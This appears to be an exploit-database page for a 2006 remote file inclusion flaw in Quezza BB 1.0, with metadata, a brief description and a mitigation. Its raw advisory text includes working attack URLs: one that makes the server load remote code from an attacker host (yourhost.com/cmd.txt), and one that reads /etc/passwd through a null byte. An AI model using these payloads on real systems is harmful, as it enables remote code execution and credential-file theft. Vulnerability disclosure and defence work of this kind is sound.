header-logo
Suggest Exploit
vendor:
Quezza BB
by:
nukedx
7,5
CVSS
HIGH
File Inclusion Vulnerability
98
CWE
Product Name: Quezza BB
Affected Version From: Quezza BB <= 1.0
Affected Version To: Quezza BB <= 1.0
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability

This exploit works on Quezza BB <= 1.0. It allows an attacker to include a remote file on the web server. This is done by exploiting the 'quezza_root_path' parameter in the 'class_template.php' script. The attacker can supply a URL which can be used to include a remote file. The exploit requires 'register_globals' to be set to 'on' for both examples.

Mitigation:

Disable 'register_globals' in the php.ini configuration file.
Source

Exploit-DB raw data:

Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability.
Method found by nukedx,
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploit works on Quezza BB <= 1.0
Original advisory can be found at: http://www.nukedx.com/?viewdoc=30
http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=http://yourhost.com/cmd.txt?
http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=/etc/passwd%00
Succesful exploitation register_globals on for both examples.
# nukedx.com [2006-04-21]

# milw0rm.com [2006-05-17]

Navigation

Suggest Exploit

Services By CQR